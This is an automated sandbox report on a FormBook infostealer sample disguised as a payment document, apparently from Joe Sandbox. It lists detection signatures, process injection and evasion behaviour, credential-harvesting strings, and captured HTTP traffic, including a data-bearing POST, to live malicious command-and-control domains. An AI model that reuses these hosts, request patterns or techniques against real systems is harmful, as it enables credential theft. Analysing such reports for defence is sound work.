Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOA - Final Payment.exe

Overview

General Information

Sample name:SOA - Final Payment.exe
Analysis ID:1612352
MD5:070cf235938777838e7c55c9f0c02993
SHA1:e32f0362867403655ca9ba219b40d453fd9ad096
SHA256:004d0b8aa2bc2236e124fceddc2ef21c091678fc622d6bce5ed02292b0b971e4
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SOA - Final Payment.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
    • SOA - Final Payment.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
    • SOA - Final Payment.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
    • SOA - Final Payment.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\SOA - Final Payment.exe" MD5: 070CF235938777838E7C55C9F0C02993)
      • 6UCrnFl0sVXS7jZvJ.exe (PID: 6728 cmdline: "C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\QTRArnsBh.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • secinit.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)
          • 6UCrnFl0sVXS7jZvJ.exe (PID: 3332 cmdline: "C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\OxrzgCNXBfF.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 8188 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.SOA - Final Payment.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.SOA - Final Payment.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.bydotoparca.netAvira URL Cloud: Label: malware
                Source: http://www.bydotoparca.net/s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUpAvira URL Cloud: Label: malware
                Source: http://www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUpAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: SOA - Final Payment.exeVirustotal: Detection: 62%Perma Link
                Source: SOA - Final Payment.exeReversingLabs: Detection: 59%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SOA - Final Payment.exeJoe Sandbox ML: detected
                Source: SOA - Final Payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SOA - Final Payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SOA - Final Payment.exe, SOA - Final Payment.exe, 00000005.00000002.1731725620.0000000001240000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 0000000A.00000003.1731171296.0000000003004000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.0000000003360000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1733240838.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2606177075.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2603955598.00000000009DE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655110436.000000000050F000.00000002.00000001.01000000.0000000C.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2602458312.000000000050F000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A6C750 FindFirstFileW,FindNextFileW,FindClose,10_2_02A6C750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then xor eax, eax10_2_02A59EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then mov ebx, 00000004h10_2_031804E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.physicsbrain.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 85.159.66.93 85.159.66.93
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp HTTP/1.1Host: www.physicsbrain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUp HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficDNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bydotoparca.net
                Source: unknownHTTP traffic detected: POST /s3u9/ HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bydotoparca.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 191Connection: closeReferer: http://www.bydotoparca.net/s3u9/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)Data Raw: 34 4a 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 4b 35 57 2b 49 4a 4d 6d 46 46 6c 79 57 6a 49 45 79 68 36 64 53 57 2b 6c 35 72 51 6f 6a 48 76 62 64 50 2f 6a 6e 2f 57 59 75 72 2b 54 68 32 38 78 53 79 2b 67 76 67 6f 53 71 61 72 68 67 49 51 6a 42 55 79 35 42 6f 66 53 6e 39 6f 73 4a 35 36 52 49 2f 4f 4a 51 51 63 58 65 56 64 43 61 41 55 49 58 49 78 50 37 31 73 55 32 6e 37 62 4b 61 70 72 32 5a 44 30 30 6a 6c 6b 49 68 59 42 56 46 75 2f 68 54 52 34 79 57 75 42 73 38 35 59 50 34 6b 7a 34 52 50 41 6e 62 2b 41 74 36 39 74 42 6e 69 52 50 78 46 52 61 6a 2b 57 39 74 47 6c 69 58 51 34 Data Ascii: 4J=ZxLiRiqne9JwK5W+IJMmFFlyWjIEyh6dSW+l5rQojHvbdP/jn/WYur+Th28xSy+gvgoSqarhgIQjBUy5BofSn9osJ56RI/OJQQcXeVdCaAUIXIxP71sU2n7bKapr2ZD00jlkIhYBVFu/hTR4yWuBs85YP4kz4RPAnb+At69tBniRPxFRaj+W9tGliXQ4
                Source: 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2608255794.0000000004FC0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bydotoparca.net
                Source: 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2608255794.0000000004FC0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bydotoparca.net/s3u9/
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: secinit.exe, 0000000A.00000003.1927763336.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: SOA - Final Payment.exe
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0042CB93 NtClose,5_2_0042CB93
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B35C0 NtCreateMutant,LdrInitializeThunk,5_2_012B35C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2B60 NtClose,LdrInitializeThunk,5_2_012B2B60
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_012B2DF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_012B2C70
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3010 NtOpenDirectoryObject,5_2_012B3010
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3090 NtSetValueKey,5_2_012B3090
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B4340 NtSetContextThread,5_2_012B4340
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B4650 NtSuspendThread,5_2_012B4650
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B39B0 NtGetContextThread,5_2_012B39B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2BA0 NtEnumerateValueKey,5_2_012B2BA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2B80 NtQueryInformationFile,5_2_012B2B80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2BE0 NtQueryValueKey,5_2_012B2BE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2BF0 NtAllocateVirtualMemory,5_2_012B2BF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2AB0 NtWaitForSingleObject,5_2_012B2AB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2AF0 NtWriteFile,5_2_012B2AF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2AD0 NtReadFile,5_2_012B2AD0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2D30 NtUnmapViewOfSection,5_2_012B2D30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2D00 NtSetInformationFile,5_2_012B2D00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2D10 NtMapViewOfSection,5_2_012B2D10
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3D10 NtOpenProcessToken,5_2_012B3D10
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B3D70 NtOpenThread,5_2_012B3D70
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2DB0 NtEnumerateKey,5_2_012B2DB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2DD0 NtDelayExecution,5_2_012B2DD0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2C00 NtQueryInformationProcess,5_2_012B2C00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2C60 NtCreateKey,5_2_012B2C60
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2CA0 NtQueryInformationToken,5_2_012B2CA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2CF0 NtOpenProcess,5_2_012B2CF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2CC0 NtQueryVirtualMemory,5_2_012B2CC0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2F30 NtCreateSection,5_2_012B2F30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2F60 NtCreateProcessEx,5_2_012B2F60
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2FA0 NtQuerySection,5_2_012B2FA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2FB0 NtResumeThread,5_2_012B2FB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2F90 NtProtectVirtualMemory,5_2_012B2F90
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2FE0 NtCreateFile,5_2_012B2FE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2E30 NtWriteVirtualMemory,5_2_012B2E30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2EA0 NtAdjustPrivilegesToken,5_2_012B2EA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2E80 NtReadVirtualMemory,5_2_012B2E80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B2EE0 NtQueueApcThread,5_2_012B2EE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D4340 NtSetContextThread,LdrInitializeThunk,10_2_033D4340
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D4650 NtSuspendThread,LdrInitializeThunk,10_2_033D4650
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2B60 NtClose,LdrInitializeThunk,10_2_033D2B60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_033D2BA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_033D2BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_033D2BE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2AF0 NtWriteFile,LdrInitializeThunk,10_2_033D2AF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2AD0 NtReadFile,LdrInitializeThunk,10_2_033D2AD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2F30 NtCreateSection,LdrInitializeThunk,10_2_033D2F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2FB0 NtResumeThread,LdrInitializeThunk,10_2_033D2FB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2FE0 NtCreateFile,LdrInitializeThunk,10_2_033D2FE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_033D2E80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_033D2EE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_033D2D30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_033D2D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_033D2DF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2DD0 NtDelayExecution,LdrInitializeThunk,10_2_033D2DD0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_033D2C70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2C60 NtCreateKey,LdrInitializeThunk,10_2_033D2C60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_033D2CA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D35C0 NtCreateMutant,LdrInitializeThunk,10_2_033D35C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D39B0 NtGetContextThread,LdrInitializeThunk,10_2_033D39B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2B80 NtQueryInformationFile,10_2_033D2B80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2AB0 NtWaitForSingleObject,10_2_033D2AB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2F60 NtCreateProcessEx,10_2_033D2F60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2FA0 NtQuerySection,10_2_033D2FA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2F90 NtProtectVirtualMemory,10_2_033D2F90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2E30 NtWriteVirtualMemory,10_2_033D2E30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2EA0 NtAdjustPrivilegesToken,10_2_033D2EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2D00 NtSetInformationFile,10_2_033D2D00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2DB0 NtEnumerateKey,10_2_033D2DB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2C00 NtQueryInformationProcess,10_2_033D2C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2CF0 NtOpenProcess,10_2_033D2CF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D2CC0 NtQueryVirtualMemory,10_2_033D2CC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3010 NtOpenDirectoryObject,10_2_033D3010
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3090 NtSetValueKey,10_2_033D3090
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3D10 NtOpenProcessToken,10_2_033D3D10
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D3D70 NtOpenThread,10_2_033D3D70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79240 NtCreateFile,10_2_02A79240
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A793A0 NtReadFile,10_2_02A793A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79690 NtAllocateVirtualMemory,10_2_02A79690
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79490 NtDeleteFile,10_2_02A79490
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A79530 NtClose,10_2_02A79530
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318F980 NtSetContextThread,10_2_0318F980
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0184DFC40_2_0184DFC4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792BF780_2_0792BF78
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_07929E480_2_07929E48
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792A6680_2_0792A668
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_07921A400_2_07921A40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792B0680_2_0792B068
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792CF800_2_0792CF80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 0_2_0792BF250_2_0792BF25
